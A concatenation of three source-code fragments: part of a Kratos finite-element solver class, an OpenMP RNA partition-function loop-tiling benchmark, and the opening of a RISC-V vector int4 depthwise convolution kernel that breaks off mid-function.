: public ResidualBasedEliminationBuilderAndSolver< TSparseSpace,TDenseSpace,TLinearSolver >
{
public:
/**@name Type Definitions */
/*@{ */
KRATOS_CLASS_POINTER_DEFINITION( ResidualBasedEliminationBuilderAndSolverComponentwise );
typedef BuilderAndSolver<TSparseSpace,TDenseSpace, TLinearSolver> BaseType;
typedef ResidualBasedEliminationBuilderAndSolver<TSparseSpace,TDenseSpace, TLinearSolver> ResidualBasedEliminationBuilderAndSolverType;
typedef typename BaseType::TSchemeType TSchemeType;
typedef typename BaseType::TDataType TDataType;
typedef typename BaseType::DofsArrayType DofsArrayType;
typedef typename BaseType::TSystemMatrixType TSystemMatrixType;
typedef typename BaseType::TSystemVectorType TSystemVectorType;
typedef typename BaseType::LocalSystemVectorType LocalSystemVectorType;
typedef typename BaseType::LocalSystemMatrixType LocalSystemMatrixType;
typedef typename BaseType::TSystemMatrixPointerType TSystemMatrixPointerType;
typedef typename BaseType::TSystemVectorPointerType TSystemVectorPointerType;
typedef typename BaseType::NodesArrayType NodesArrayType;
typedef typename BaseType::ElementsArrayType ElementsArrayType;
typedef typename BaseType::ConditionsArrayType ConditionsArrayType;
typedef typename BaseType::ElementsContainerType ElementsContainerType;
///@}
///@name Life Cycle
///@{
/**
* @brief Default constructor. (with parameters)
*/
explicit ResidualBasedEliminationBuilderAndSolverComponentwise(
typename TLinearSolver::Pointer pNewLinearSystemSolver,
Parameters ThisParameters
) : ResidualBasedEliminationBuilderAndSolverType(pNewLinearSystemSolver)
{
// Validate default parameters
Parameters default_parameters = Parameters(R"(
{
"name" : "ResidualBasedEliminationBuilderAndSolverComponentwise",
"components_wise_variable" : "SCALAR_VARIABLE_OR_COMPONENT"
})" );
ThisParameters.ValidateAndAssignDefaults(default_parameters);
rVar = KratosComponents<TVariableType>::Get(ThisParameters["components_wise_variable"].GetString());
}
/**
* @brief Default constructor. Constructor.
*/
explicit ResidualBasedEliminationBuilderAndSolverComponentwise(
typename TLinearSolver::Pointer pNewLinearSystemSolver,TVariableType const& Var)
: ResidualBasedEliminationBuilderAndSolverType(pNewLinearSystemSolver)
, rVar(Var)
{
/* std::cout << "using the standard builder and solver " << std::endl; */
}
/** Destructor.
*/
~ResidualBasedEliminationBuilderAndSolverComponentwise() override {}
/*@} */
/**@name Operators
*/
/*@{ */
//**************************************************************************
//**************************************************************************
void Build(
typename TSchemeType::Pointer pScheme,
ModelPart& r_model_part,
TSystemMatrixType& A,
TSystemVectorType& b) override
{
KRATOS_TRY
if(!pScheme)
KRATOS_THROW_ERROR(std::runtime_error, "No scheme provided!", "");
//getting the elements from the model
ElementsArrayType& pElements = r_model_part.Elements();
//getting the array of the conditions
ConditionsArrayType& ConditionsArray = r_model_part.Conditions();
//resetting to zero the vector of reactions
TSparseSpace::SetToZero( *(BaseType::mpReactionsVector) );
//create a partition of the element array
int number_of_threads = ParallelUtilities::GetNumThreads();
#ifdef _OPENMP
int A_size = A.size1();
//creating an array of lock variables of the size of the system matrix
std::vector< omp_lock_t > lock_array(A.size1());
for(int i = 0; i<A_size; i++)
omp_init_lock(&lock_array[i]);
#endif
DenseVector<unsigned int> element_partition;
CreatePartition(number_of_threads, pElements.size(), element_partition);
if (this->GetEchoLevel()>0)
{
KRATOS_WATCH( number_of_threads );
KRATOS_WATCH( element_partition );
}
const auto timer = BuiltinTimer();
#pragma omp parallel for firstprivate(number_of_threads) schedule(static,1)
for(int k=0; k<number_of_threads; k++)
{
//contributions to the system
LocalSystemMatrixType LHS_Contribution = LocalSystemMatrixType(0,0);
LocalSystemVectorType RHS_Contribution = LocalSystemVectorType(0);
//vector containing the localization in the system of the different
//terms
Element::EquationIdVectorType EquationId;
const ProcessInfo& CurrentProcessInfo = r_model_part.GetProcessInfo();
typename ElementsArrayType::ptr_iterator it_begin=pElements.ptr_begin()+element_partition[k];
typename ElementsArrayType::ptr_iterator it_end=pElements.ptr_begin()+element_partition[k+1];
unsigned int pos = (r_model_part.Nodes().begin())->GetDofPosition(rVar);
// assemble all elements
for (typename ElementsArrayType::ptr_iterator it=it_begin; it!=it_end; ++it)
{
//calculate elemental contribution
(*it)->CalculateLocalSystem(LHS_Contribution,RHS_Contribution,CurrentProcessInfo);
Geometry< Node<3> >& geom = (*it)->GetGeometry();
if(EquationId.size() != geom.size()) EquationId.resize(geom.size(),false);
for(unsigned int i=0; i<geom.size(); i++)
EquationId[i] = geom[i].GetDof(rVar,pos).EquationId();
//assemble the elemental contribution
#ifdef USE_LOCKS_IN_ASSEMBLY
this->Assemble(A,b,LHS_Contribution,RHS_Contribution,EquationId,lock_array);
#else
this->Assemble(A,b,LHS_Contribution,RHS_Contribution,EquationId);
#endif
}
}
DenseVector<unsigned int> condition_partition;
CreatePartition(number_of_threads, ConditionsArray.size(), condition_partition);
#pragma omp parallel for firstprivate(number_of_threads) schedule(static,1)
for(int k=0; k<number_of_threads; k++)
{
//contributions to the system
LocalSystemMatrixType LHS_Contribution = LocalSystemMatrixType(0,0);
LocalSystemVectorType RHS_Contribution = LocalSystemVectorType(0);
Condition::EquationIdVectorType EquationId;
const ProcessInfo& CurrentProcessInfo = r_model_part.GetProcessInfo();
typename ConditionsArrayType::ptr_iterator it_begin=ConditionsArray.ptr_begin()+condition_partition[k];
typename ConditionsArrayType::ptr_iterator it_end=ConditionsArray.ptr_begin()+condition_partition[k+1];
unsigned int pos = (r_model_part.Nodes().begin())->GetDofPosition(rVar);
// A all elements
for (typename ConditionsArrayType::ptr_iterator it=it_begin; it!=it_end; ++it)
{
//calculate elemental contribution
(*it)->CalculateLocalSystem(LHS_Contribution,RHS_Contribution,CurrentProcessInfo);
Geometry< Node<3> >& geom = (*it)->GetGeometry();
if(EquationId.size() != geom.size()) EquationId.resize(geom.size(),false);
for(unsigned int i=0; i<geom.size(); i++)
{
EquationId[i] = geom[i].GetDof(rVar,pos).EquationId();
}
#ifdef USE_LOCKS_IN_ASSEMBLY
this->Assemble(A,b,LHS_Contribution,RHS_Contribution,EquationId,lock_array);
#else
this->Assemble(A,b,LHS_Contribution,RHS_Contribution,EquationId);
#endif
}
}
if (this->GetEchoLevel()>0) {
std::cout << "parallel building time: " << timer.ElapsedSeconds() << std::endl;
}
#ifdef _OPENMP
for(int i = 0; i<A_size; i++)
omp_destroy_lock(&lock_array[i]);
#endif
KRATOS_CATCH("")
}
//**************************************************************************
//**************************************************************************
void SetUpDofSet(
typename TSchemeType::Pointer pScheme,
ModelPart& r_model_part
) override
{
KRATOS_TRY
//fills a list of "active" nodes defined as nodes which have neighbours
// AND no fixed pressure
mActiveNodes.clear();
mActiveNodes.reserve(r_model_part.Nodes().size() );
for (typename NodesArrayType::iterator it=r_model_part.NodesBegin(); it!=r_model_part.NodesEnd(); ++it)
{
if( (it->GetValue(NEIGHBOUR_NODES)).size() != 0 )
{
mActiveNodes.push_back(*(it.base() ));
}
}
//fills the DofList and give a unique progressive tag to each node
BaseType::mDofSet.clear();
BaseType::mDofSet.reserve(mActiveNodes.size() );
for(GlobalPointersVector< Node<3> >::iterator iii = mActiveNodes.begin(); iii!=mActiveNodes.end(); iii++)
{
BaseType::mDofSet.push_back( iii->pGetDof(rVar) );
}
//throws an execption if there are no Degrees of freedom involved in the analysis
if (BaseType::mDofSet.size()==0)
KRATOS_THROW_ERROR(std::logic_error, "No degrees of freedom!", "");
BaseType::mDofSetIsInitialized = true;
// If reactions are to be calculated, we check if all the dofs have reactions defined
// This is tobe done only in debug mode
#ifdef KRATOS_DEBUG
if(BaseType::GetCalculateReactionsFlag())
{
for(auto dof_iterator = BaseType::mDofSet.begin(); dof_iterator != BaseType::mDofSet.end(); ++dof_iterator)
{
KRATOS_ERROR_IF_NOT(dof_iterator->HasReaction()) << "Reaction variable not set for the following : " <<std::endl
<< "Node : "<<dof_iterator->Id()<< std::endl
<< "Dof : "<<(*dof_iterator)<<std::endl<<"Not possible to calculate reactions."<<std::endl;
}
}
#endif
KRATOS_CATCH("")
}
//**************************************************************************
//**************************************************************************
void ResizeAndInitializeVectors(
typename TSchemeType::Pointer pScheme,
TSystemMatrixPointerType& pA,
TSystemVectorPointerType& pDx,
TSystemVectorPointerType& pb,
ModelPart& rModelPart
) override
{
KRATOS_TRY
if(pA == NULL) //if the pointer is not initialized initialize it to an empty matrix
{
TSystemMatrixPointerType pNewA = TSystemMatrixPointerType(new TSystemMatrixType(0,0) );
pA.swap(pNewA);
}
if(pDx == NULL) //if the pointer is not initialized initialize it to an empty matrix
{
TSystemVectorPointerType pNewDx = TSystemVectorPointerType(new TSystemVectorType(0) );
pDx.swap(pNewDx);
}
if(pb == NULL) //if the pointer is not initialized initialize it to an empty matrix
{
TSystemVectorPointerType pNewb = TSystemVectorPointerType(new TSystemVectorType(0) );
pb.swap(pNewb);
}
if(BaseType::mpReactionsVector == NULL) //if the pointer is not initialized initialize it to an empty matrix
{
TSystemVectorPointerType pNewReactionsVector = TSystemVectorPointerType(new TSystemVectorType(0) );
BaseType::mpReactionsVector.swap(pNewReactionsVector);
}
TSystemMatrixType& A = *pA;
TSystemVectorType& Dx = *pDx;
TSystemVectorType& b = *pb;
//resizing the system vectors and matrix
if (A.size1() == 0 || BaseType::GetReshapeMatrixFlag() == true) //if the matrix is not initialized
{
A.resize(BaseType::mEquationSystemSize,BaseType::mEquationSystemSize,false);
#ifdef _OPENMP
ParallelConstructGraph(A);
#else
ConstructGraph(A);
#endif
}
else
{
if(A.size1() != BaseType::mEquationSystemSize || A.size2() != BaseType::mEquationSystemSize)
{
//KRATOS_WATCH("it should not come here!!!!!!!! ... this is SLOW");
KRATOS_ERROR <<"The equation system size has changed during the simulation. This is not permited."<<std::endl;
A.resize(BaseType::mEquationSystemSize,BaseType::mEquationSystemSize,true);
#ifdef _OPENMP
ParallelConstructGraph(A);
#else
ConstructGraph(A);
#endif
}
}
if (Dx.size() != BaseType::mEquationSystemSize) {
Dx.resize(BaseType::mEquationSystemSize, false);
}
TSparseSpace::SetToZero(Dx);
if (b.size() != BaseType::mEquationSystemSize) {
b.resize(BaseType::mEquationSystemSize, false);
}
TSparseSpace::SetToZero(b);
//if needed resize the vector for the calculation of reactions
if(BaseType::mCalculateReactionsFlag == true)
{
unsigned int ReactionsVectorSize = BaseType::mDofSet.size();
if(BaseType::mpReactionsVector->size() != ReactionsVectorSize)
BaseType::mpReactionsVector->resize(ReactionsVectorSize,false);
}
//swapping pointers
// pA.swap(pNewA);
// pDx.swap(pNewDx);
// pb.swap(pNewb);
#ifndef __SUNPRO_CC
KRATOS_CATCH("")
#endif
}
//**************************************************************************
//**************************************************************************
void Clear() override
{
this->mDofSet = DofsArrayType();
if(this->mpReactionsVector != NULL)
{
TSparseSpace::Clear( (this->mpReactionsVector) );
}
// *(this->mpReactionsVector) = TSystemVectorType();
if (this->GetEchoLevel()>1)
{
KRATOS_WATCH("ResidualBasedEliminationBuilderAndSolver Clear Function called");
}
}
/*@} */
/**@name Operations */
/*@{ */
/*@} */
/**@name Access */
/*@{ */
/*@} */
/**@name Inquiry */
/*@{ */
///@}
///@name Input and output
///@{
/// Turn back information as a string.
std::string Info() const override
{
return "ResidualBasedEliminationBuilderAndSolverComponentwise";
}
/// Print information about this object.
void PrintInfo(std::ostream& rOStream) const override
{
rOStream << Info();
}
/// Print object's data.
void PrintData(std::ostream& rOStream) const override
{
rOStream << Info();
}
/*@} */
/**@name Friends */
/*@{ */
/*@} */
protected:
/**@name Protected static Member Variables */
/*@{ */
/*@} */
/**@name Protected member Variables */
/*@{ */
/*@} */
/**@name Protected Operators*/
/*@{ */
//**************************************************************************
//**************************************************************************
//**************************************************************************
//**************************************************************************
void ConstructGraph(TSystemMatrixType& A)
{
KRATOS_TRY
std::vector< std::vector<int> > index_list(BaseType::mEquationSystemSize);
int total_size = 0;
unsigned int pos = (mActiveNodes.begin())->GetDofPosition(rVar);
//constructing the system matrix row by row
int index_i;
for(GlobalPointersVector< Node<3> >::iterator in = mActiveNodes.begin();
in!=mActiveNodes.end(); in++)
{
const Node<3>::DofType& current_dof = in->GetDof(rVar,pos);
if( current_dof.IsFixed() == false)
{
index_i = (current_dof).EquationId();
GlobalPointersVector< Node<3> >& neighb_nodes = in->GetValue(NEIGHBOUR_NODES);
std::vector<int>& indices = index_list[index_i];
indices.reserve(neighb_nodes.size()+1);
//filling the first neighbours list
indices.push_back(index_i);
for( GlobalPointersVector< Node<3> >::iterator i = neighb_nodes.begin();
i != neighb_nodes.end(); i++)
{
const Node<3>::DofType& neighb_dof = i->GetDof(rVar,pos);
if(neighb_dof.IsFixed() == false )
{
int index_j = (neighb_dof).EquationId();
indices.push_back(index_j);
}
}
//sorting the indices and elminating the duplicates
std::sort(indices.begin(),indices.end());
typename std::vector<int>::iterator new_end = std::unique(indices.begin(),indices.end());
indices.erase(new_end,indices.end());
total_size += indices.size();
}
}
A.reserve(total_size,false);
//setting to zero the matrix (and the diagonal matrix)
for(unsigned int i=0; i<BaseType::mEquationSystemSize; i++)
{
std::vector<int>& indices = index_list[i];
for(unsigned int j=0; j<indices.size(); j++)
{
A.push_back(i,indices[j] , 0.00);
}
}
KRATOS_CATCH("")
}
//**************************************************************************
//**************************************************************************
//**************************************************************************
//**************************************************************************
#ifdef _OPENMP
void ParallelConstructGraph(TSystemMatrixType& A)
{
#ifndef __SUNPRO_CC
KRATOS_TRY
#endif
std::vector< std::vector<int> > index_list(BaseType::mEquationSystemSize);
int number_of_threads = omp_get_max_threads();
unsigned int pos = (mActiveNodes.begin())->GetDofPosition(rVar);
//constructing the system matrix row by row
DenseVector<unsigned int> partition;
DenseVector<unsigned int> local_sizes(number_of_threads);
for(int i=0; i<number_of_threads; i++)
local_sizes[i] = 0;
CreatePartition(number_of_threads, mActiveNodes.size(), partition);
#pragma omp parallel for firstprivate(number_of_threads,pos) schedule(static,1)
for(int k=0; k<number_of_threads; k++)
{
GlobalPointersVector< Node<3> >::iterator it_begin = mActiveNodes.begin()+partition[k];
GlobalPointersVector< Node<3> >::iterator it_end = mActiveNodes.begin()+partition[k+1];
for(GlobalPointersVector< Node<3> >::iterator in = it_begin;
in!=it_end; in++)
{
const Node<3>::DofType& current_dof = in->GetDof(rVar,pos);
if( current_dof.IsFixed() == false)
{
int index_i = (current_dof).EquationId();
GlobalPointersVector< Node<3> >& neighb_nodes = in->GetValue(NEIGHBOUR_NODES);
std::vector<int>& indices = index_list[index_i];
indices.reserve(neighb_nodes.size()+1);
//filling the first neighbours list
indices.push_back(index_i);
for( GlobalPointersVector< Node<3> >::iterator i = neighb_nodes.begin();
i != neighb_nodes.end(); i++)
{
const Node<3>::DofType& neighb_dof = i->GetDof(rVar,pos);
if(neighb_dof.IsFixed() == false )
{
int index_j = (neighb_dof).EquationId();
indices.push_back(index_j);
}
}
//sorting the indices and elminating the duplicates
std::sort(indices.begin(),indices.end());
typename std::vector<int>::iterator new_end = std::unique(indices.begin(),indices.end());
indices.erase(new_end,indices.end());
local_sizes[k] += indices.size();
}
}
}
//calculate the total size of the system
int total_size = 0.0;
for(int i=0; i<number_of_threads; i++)
total_size += local_sizes[i];
A.reserve(total_size,false);
//setting to zero the matrix (and the diagonal matrix)
for(unsigned int i=0; i<BaseType::mEquationSystemSize; i++)
{
std::vector<int>& indices = index_list[i];
for(unsigned int j=0; j<indices.size(); j++)
{
A.push_back(i,indices[j] , 0.00);
}
}
#ifndef __SUNPRO_CC
KRATOS_CATCH("")
#endif
}
#endif
/*@} */
/**@name Protected Operations*/
/*@{ */
/*@} */
/**@name Protected Access */
/*@{ */
/*@} */
/**@name Protected Inquiry */
/*@{ */
/*@} */
/**@name Protected LifeCycle */
/*@{ */
/*@} */
private:
/**@name Static Member Variables */
/*@{ */
/*@} */
/**@name Member Variables */
/*@{ */
TVariableType const & rVar;
GlobalPointersVector<Node<3> > mActiveNodes;
/*@} */
/**@name Private Operators*/
/*@{ */
//******************************************************************************************
//******************************************************************************************
inline void CreatePartition(unsigned int number_of_threads,const int number_of_rows, DenseVector<unsigned int>& partitions)
{
partitions.resize(number_of_threads+1);
int partition_size = number_of_rows / number_of_threads;
partitions[0] = 0;
partitions[number_of_threads] = number_of_rows;
for(unsigned int i = 1; i<number_of_threads; i++)
partitions[i] = partitions[i-1] + partition_size ;
}
/*@} */
/**@name Private Operations*/
/*@{ */
/*@} */
/**@name Private Access */
/*@{ */
/*@} */
/**@name Private Inquiry */
/*@{ */
/*@} */
/**@name Un accessible methods */
/*@{ */
/*@} */
}; /* Class ResidualBasedEliminationBuilderAndSolverComponentwise */
/*@} */
/**@name Type Definitions */
/*@{ */
/*@} */
} /* namespace Kratos.*/
#endif /* KRATOS_RESIDUAL_BASED_ELIMINATION_BUILDER_AND_SOLVERCOMPONENTWISE defined */
|
mea_pb2_traco.c | #include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <omp.h>
#include <math.h>
#define min(a,b) (((a)<(b))?(a):(b))
#define MIN(a,b) (((a)<(b))?(a):(b))
#define max(a,b) (((a)>(b))?(a):(b))
#define MAX(a,b) (((a)>(b))?(a):(b))
#define floord(n,d) floor(((double)(n))/((double)(d)))
#define ceild(n,d) ceil(((double)(n))/((double)(d)))
double ** Q;
double ** Qbp;
double ** Pbp;
double ** Pu;
double ** M;
int Ebp = 0; // Energy weight of base pair -2, -1, 0, 1, 2
int RT = 1; // 'Normalized' temperature 1,2,3,4,5
float ERT;
int l = 0; //minimum loop length 0-5
int delta = 1; // Base pair weighting 1-5
char * RNA; //only ACGU
int N;
int DIM;
#include "../mem.h"
int paired(int i, int j) {
char nt1 = RNA[i];
char nt2 = RNA[j];
if ((nt1 == 'A' && nt2 == 'U') || (nt1 == 'U' && nt2 == 'A') ||
(nt1 == 'G' && nt2 == 'C') || (nt1 == 'C' && nt2 == 'G') ||
(nt1 == 'G' && nt2 == 'U') || (nt1 == 'U' && nt2 == 'G')){
return 1;}
else
return 0;
}
int main(int argc, char *argv[]){
int num_proc=1;
int i,j,k,ll,p,q;
int c0, c1,c2,c3,c4,c5,c6,c7,c8,c9,c10,c11,c12,c13,c15;
int t1, t2, t3, t4, t5, t6,t7;
int lb, ub, lbp, ubp, lb2, ub2;
register int lbv, ubv;
ERT = exp((float)-Ebp/(float)RT);
srand(time(NULL));
if(argc > 1)
num_proc = atoi(argv[1]);
int kind=1;
N = 8;
DIM = 12;
if(argc > 2)
N = atoi(argv[2]);
DIM = N+10;
if(argc > 3)
kind = atoi(argv[3]);
omp_set_num_threads(num_proc);
//printf(" -exp(Ebp/RT) = %5.3f\n", ERT);
RNA = (char*) malloc(DIM * sizeof(char*)); //read from FASTA file
rand_seq(RNA, N);
//printf("Sequence: ");
//for(i=0; i<N; i++)
// printf("%c", RNA[i]);
//printf("\n\n");
Q = memd();
Qbp = memd();
Pbp = memd();
Pu = memd();
M = memd();
rna_array_init(Q, 1, 1);
rna_array_init(Qbp, 0, 0);
rna_array_init(Pbp, 0, 0);
rna_array_init(Pu, 0, 0);
rna_array_init(M, 0, 0);
double start = omp_get_wtime();
// compute the partition functions Q and Qbp
if(kind==1){
#pragma scop
for(i=0; i<N; i++){
for(j=i+1; j<N; j++){
for(p=0; p<i; p++){
for(q=j+1; q<N; q++){
Pbp[i][j] += (Pbp[p][q] * ERT * Q[p+1][i] * Qbp[i][j] * Q[j+1][q-1]) / (Qbp[p][q] ==0 ? 1 : Qbp[p][q]);
}
}
Pbp[i][j] += (Q[0][i]*Q[j][N-1]*Qbp[i][j])/Q[0][N-1];
}
}
#pragma endscop
}
if(kind==2) // pluto
{
printf("pluto\n");
/* Start of CLooG code */
if(1==0)
if (N >= 2) {
for (t1=0;t1<=N-2;t1++) {
lbp=t1+1;
ubp=N-1;
#pragma omp parallel for private(lbv,ubv,t3,t4,t5,t6)
for (t2=lbp;t2<=ubp;t2++) {
if (t2 <= N-2) {
for (t3=0;t3<=floord(t1-1,16);t3++) {
for (t5=16*t3;t5<=min(t1-1,16*t3+15);t5++) {
for (t6=t2+1;t6<=N-1;t6++) {
Pbp[t1][t2] += (Pbp[t5][t6] * ERT * Q[t5+1][t1] * Qbp[t1][t2] * Q[t2+1][t6-1]) / (Qbp[t5][t6] ==0 ? 1 : Qbp[t5][t6]);;
}
}
}
}
t3 = floord(t1,16);
Pbp[t1][t2] += (Q[0][t1]*Q[t2][N-1]*Qbp[t1][t2])/Q[0][N-1];;
}
}
}
/* Start of CLooG code */
if(1==1)
if (N >= 2) {
for (t1=0;t1<=N-2;t1++) {
lbp=ceild(t1-14,16);
ubp=floord(N-1,16);
#pragma omp parallel for private(lbv,ubv,t3,t4,t5,t6)
for (t2=lbp;t2<=ubp;t2++) {
for (t3=0;t3<=floord(t1,16);t3++) {
if ((t1 >= 16*t3+1) && (t1 <= 16*t3+15)) {
for (t4=max(16*t2,t1+1);t4<=min(N-2,16*t2+15);t4++) {
for (t5=16*t3;t5<=t1-1;t5++) {
for (t6=t4+1;t6<=N-1;t6++) {
Pbp[t1][t4] += (Pbp[t5][t6] * ERT * Q[t5+1][t1] * Qbp[t1][t4] * Q[t4+1][t6-1]) / (Qbp[t5][t6] ==0 ? 1 : Qbp[t5][t6]);;
}
}
Pbp[t1][t4] += (Q[0][t1]*Q[t4][N-1]*Qbp[t1][t4])/Q[0][N-1];;
}
}
if (t1 >= 16*t3+16) {
for (t4=max(16*t2,t1+1);t4<=min(N-2,16*t2+15);t4++) {
for (t5=16*t3;t5<=16*t3+15;t5++) {
for (t6=t4+1;t6<=N-1;t6++) {
Pbp[t1][t4] += (Pbp[t5][t6] * ERT * Q[t5+1][t1] * Qbp[t1][t4] * Q[t4+1][t6-1]) / (Qbp[t5][t6] ==0 ? 1 : Qbp[t5][t6]);;
}
}
}
}
if ((t1 >= 16*t3+1) && (t1 <= 16*t3+15) && (t2 >= ceild(N-16,16))) {
Pbp[t1][(N-1)] += (Q[0][t1]*Q[(N-1)][N-1]*Qbp[t1][(N-1)])/Q[0][N-1];;
}
if (t1 == 16*t3) {
for (t4=max(16*t2,t1+1);t4<=min(N-1,16*t2+15);t4++) {
if (t1%16 == 0) {
Pbp[t1][t4] += (Q[0][t1]*Q[t4][N-1]*Qbp[t1][t4])/Q[0][N-1];;
}
}
}
}
}
}
}
/*End of CLooG code */
}
if(kind==3) // traco
{
printf("traco\n");
/* for( c1 = 0; c1 < N - 1; c1 += 1)
#pragma omp parallel for schedule(dynamic , 1)
for( c3 = 0; c3 <= (N - c1 - 2) / 16; c3 += 1)
for( c4 = max(max(0, -c1 + 1), -N + c1 + 16 * c3 + 3); c4 <= 1; c4 += 1) {
if (c4 == 1) {
for( c11 = c1 + 16 * c3 + 1; c11 <= min(N - 1, c1 + 16 * c3 + 16); c11 += 1)
Pbp[c1][c11] += (Q[0][c1]*Q[c11][N-1]*Qbp[c1][c11])/Q[0][N-1];
} else {
for( c5 = 0; c5 <= (c1 - 1) / 16; c5 += 1)
for( c7 = 0; c7 <= -c3 + (N - c1 - 3) / 16; c7 += 1)
for( c11 = c1 + 16 * c3 + 1; c11 <= min(c1 + 16 * c3 + 16, N - 16 * c7 - 2); c11 += 1) {
if (N >= 16 * c7 + c11 + 18) {
for( c15 = 16 * c7 + c11 + 1; c15 <= 16 * c7 + c11 + 16; c15 += 1)
Pbp[c1][c11] += (Pbp[16*c5][c15] * ERT * Q[16*c5+1][c1] * Qbp[c1][c11] * Q[c11+1][c15-1]) / (Qbp[16*c5][c15] ==0 ? 1 : Qbp[16*c5][c15]);
} else {
for( c13 = 16 * c5; c13 <= min(c1 - 1, 16 * c5 + 15); c13 += 1) {
if (c13 >= 16 * c5 + 1)
for( c15 = c11 + 1; c15 <= 16 * c7 + c11; c15 += 1)
Pbp[c1][c11] += (Pbp[c13][c15] * ERT * Q[c13+1][c1] * Qbp[c1][c11] * Q[c11+1][c15-1]) / (Qbp[c13][c15] ==0 ? 1 : Qbp[c13][c15]);
for( c15 = 16 * c7 + c11 + 1; c15 < N; c15 += 1)
Pbp[c1][c11] += (Pbp[c13][c15] * ERT * Q[c13+1][c1] * Qbp[c1][c11] * Q[c11+1][c15-1]) / (Qbp[c13][c15] ==0 ? 1 : Qbp[c13][c15]);
}
}
}
}
}
*/
for( c1 = 0; c1 < N - 1; c1 += 1)
#pragma omp parallel for schedule(dynamic , 1)
for( c3 = 0; c3 < N - c1 - 1; c3 += 1)
for( c4 = max(max(0, -c1 + 1), -N + c1 + c3 + 3); c4 <= 1; c4 += 1) {
if (c4 == 1) {
Pbp[c1][(c1+c3+1)] += (Q[0][c1]*Q[(c1+c3+1)][N-1]*Qbp[c1][(c1+c3+1)])/Q[0][N-1];
} else {
for( c5 = 0; c5 <= (c1 - 1) / 128; c5 += 1)
for( c7 = 0; c7 <= (N - c1 - c3 - 3) / 16; c7 += 1) {
if (N >= c1 + c3 + 16 * c7 + 19) {
for( c15 = c1 + c3 + 16 * c7 + 2; c15 <= c1 + c3 + 16 * c7 + 17; c15 += 1)
Pbp[c1][(c1+c3+1)] += (Pbp[128*c5][c15] * ERT * Q[128*c5+1][c1] * Qbp[c1][(c1+c3+1)] * Q[(c1+c3+1)+1][c15-1]) / (Qbp[128*c5][c15] ==0 ? 1 : Qbp[128*c5][c15]);
} else {
for( c13 = 128 * c5; c13 <= min(c1 - 1, 128 * c5 + 127); c13 += 1) {
if (c13 >= 128 * c5 + 1)
for( c15 = c1 + c3 + 2; c15 <= c1 + c3 + 16 * c7 + 1; c15 += 1)
Pbp[c1][(c1+c3+1)] += (Pbp[c13][c15] * ERT * Q[c13+1][c1] * Qbp[c1][(c1+c3+1)] * Q[(c1+c3+1)+1][c15-1]) / (Qbp[c13][c15] ==0 ? 1 : Qbp[c13][c15]);
for( c15 = c1 + c3 + 16 * c7 + 2; c15 < N; c15 += 1)
Pbp[c1][(c1+c3+1)] += (Pbp[c13][c15] * ERT * Q[c13+1][c1] * Qbp[c1][(c1+c3+1)] * Q[(c1+c3+1)+1][c15-1]) / (Qbp[c13][c15] ==0 ? 1 : Qbp[c13][c15]);
}
}
}
}
}
}
if(kind==4) // traco tstile
{
}
double stop = omp_get_wtime();
printf("%.4f\n",stop - start);
//printf("Q\n");
//rna_array_print(Q);
//printf("Qbp\n");
//rna_array_print(Qbp);
exit(0);
printf("Pbp\n");
rna_array_print(Pbp);
#pragma scop
for(i=N-1; i>=0; i--){
for(j=i+1; j<N; j++){
Pu[i][j] = (Q[0][i]*Q[j][N-1]*1)/Q[0][N-1];
for(p=0; p<i; p++){
for(q=j+1; q<N; q++){
Pu[i][j] += (Pbp[p][q] * ERT * Q[p+1][i] * 1 * Q[j+1][q-1]) / (Qbp[p][q] ==0 ? 1 : Qbp[p][q]) ;
}
}
}
}
#pragma endscop
printf("Pu\n");
rna_array_print(Pu);
double * Puu = (double*)malloc(DIM * sizeof(double));
#pragma scop
for(i=0; i<=N; i++){
Puu[i] = 1;
for(j=i+1; j<N; j++){
Puu[i] += -1 * Pbp[i][j+1];
}
for(k=0; k<i; k++){
Puu[i] += -1 * Pbp[k][i+1];
}
}
#pragma endscop
printf("Puu\n");
for(i=0; i<N-1; i++)
printf("%3.3f ", Puu[i]);
printf("\n");
#pragma scop
for(i=N-1; i>=0; i--){
for(j=i+1; j<N; j++){
for(k=0; k<j-i-l; k++){
M[i][j] = MAX(M[i][j], M[i][k+i-1] + M[k+i+1][j-1] + delta*Pbp[k+i][j])*paired(k+i,j-1);
}
M[i][j] = MAX(M[i][j], M[i][j-1] + Puu[j-1]);
}
}
#pragma endscop
printf("M\n");
rna_array_print(M);
return 0;
}
|
depthwise_convolution_3x3_int4.c | /*
* Copyright (C) 2016-2022 T-Head Semiconductor Co., Ltd. All rights reserved.
*
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the License); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an AS IS BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/* CSI-NN2 version 1.12.x */
#include "csi_thead_rvv.h"
static vint8m1_t requantize_m4(vint32m4_t _src, int32_t multiplier, int32_t shift, int32_t out_zp,
int vl)
{
vint32m4_t _mulh = vmulh_vx_i32m4(_src, multiplier, vl);
_mulh = vssra_vx_i32m4(_mulh, -shift - 1, vl);
_mulh = vadd_vx_i32m4(_mulh, out_zp, vl);
vint16m2_t _tmp1 = vnclip_wx_i16m2(_mulh, 0, vl);
vint8m1_t _tmp2 = vnclip_wx_i8m1(_tmp1, 0, vl);
return _tmp2;
}
int csi_nn_rvv_dwconv3x3s1_int4(struct csi_tensor *input, struct csi_tensor *output,
struct csi_tensor *kernel, struct csi_tensor *bias,
struct conv2d_params *params)
{
int8_t *input_data = (int8_t *)input->data;
int8_t *output_data = (int8_t *)output->data;
int8_t *kernel_data = (int8_t *)kernel->data;
int32_t *bias_data = (int32_t *)bias->data;
int32_t batch = input->dim[0];
int32_t in_h = input->dim[1];
int32_t in_w = input->dim[2];
int32_t in_c = input->dim[3]; // group = in_channel
int32_t out_h = output->dim[1];
int32_t out_w = output->dim[2];
int32_t out_c = output->dim[3];
int8_t *input_padd_buf = (int8_t *)csi_mem_alloc((in_h + params->pad_top + params->pad_down) *
(in_w + params->pad_left + params->pad_right) *
in_c * sizeof(int8_t));
int8_t pad_value = input->qinfo->zero_point;
csi_nn_rvv_pad_input_int4_trans_int8(
input_data, input_padd_buf, in_c, in_h, in_w, in_h + params->pad_top + params->pad_down,
in_w + params->pad_left + params->pad_right, params->pad_top, params->pad_left,
input->qinfo->zero_point);
int8_t *kernel_tran_buf = (int8_t *)csi_mem_alloc(9 * in_c * sizeof(int8_t));
